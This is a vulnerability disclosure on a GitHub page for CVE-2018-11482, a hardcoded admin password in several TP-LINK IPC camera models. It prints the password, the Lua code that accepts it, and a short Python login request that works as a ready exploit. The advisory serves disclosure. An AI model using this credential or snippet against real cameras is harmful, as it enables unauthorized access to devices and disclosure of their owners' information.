Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
IOT-pwn-for-fun/TP-LINK-login-Escalation-of-Privileges
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
86 lines (61 sloc)
2.05 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Suggested description] | |
| /usr/lib/lua/luci/websys.lua on TP-LINK IPC TL-IPC223(P)-6, | |
| TL-IPC323K-D, TL-IPC325(KP)-*, and TL-IPC40A-4 devices has a hardcoded factory | |
| zMiVw8Kw0oxKXL0 password. Nearly All devices on the Internet(more then 10000) can be directly | |
| login success,which lead to escalation of privileges and information disclosure. | |
| ------------------------------------------ | |
| [Additional Information] | |
| Hard Coded Password in TP-LINK IPC Camera leading to Escalation of Privileges and Information Disclosure | |
| ------------------------------------------ | |
| [Vulnerability Type] | |
| Incorrect Access Control | |
| ------------------------------------------ | |
| [Vendor of Product] | |
| TP-LINK | |
| ------------------------------------------ | |
| [Affected Product Code Base] | |
| TP-LINK IPC Camera - TL-IPC325(KP)-* | |
| TP-LINK IPC Camera - TL-IPC323K-D * | |
| TP-link IPC Camera - TL-IPC40A-4 * | |
| TP-LINK IPC Camera - TL-IPC223(P)-6 * | |
| ------------------------------------------ | |
| [Affected Component] | |
| /usr/lib/lua/luci/websys.lua: | |
| DEFAULT_PWD = "zMiVw8Kw0oxKXL0" | |
| ... | |
| skip | |
| ... | |
| if not e then | |
| return true | |
| end | |
| if e == DEFAULT_PWD then | |
| return true | |
| ... | |
| ------------------------------------------ | |
| [Attack Type] | |
| Remote | |
| ------------------------------------------ | |
| [Impact Escalation of Privileges] | |
| true | |
| ------------------------------------------ | |
| [Impact Information Disclosure] | |
| true | |
| ------------------------------------------ | |
| [Attack Vectors] | |
| headers = {"Content-Type":"application/json; charset=UTF-8"} | |
| r = requests.post("http://%s/"%ip, '{"method":"do","login":{"username":"admin","password":"zMiVw8Kw0oxKXL0"}}', headers = headers) | |
| ret = json.loads(r.text) | |
| ------------------------------------------ | |
| [Reference] | |
| http://service.tp-link.com.cn/detail_download_5471.html(official firmware) | |
| https://www.tp-link.com/us/security | |
| ------------------------------------------ | |
| [Discoverer] | |
| dbappsecurity | |
| [Timeline] | |
| 2018-02-01 Find Vuln. | |
| 2018-02-02 Try to contact TP-Link China ... | |
| 2018-05-24 Failed To contact TP-Link China. | |
| 2018-05-25 Submit to CVE mitre. | |
| 2018-05-26 Got CVE-2018-11482. | |
| 2018-05-28 Make public. |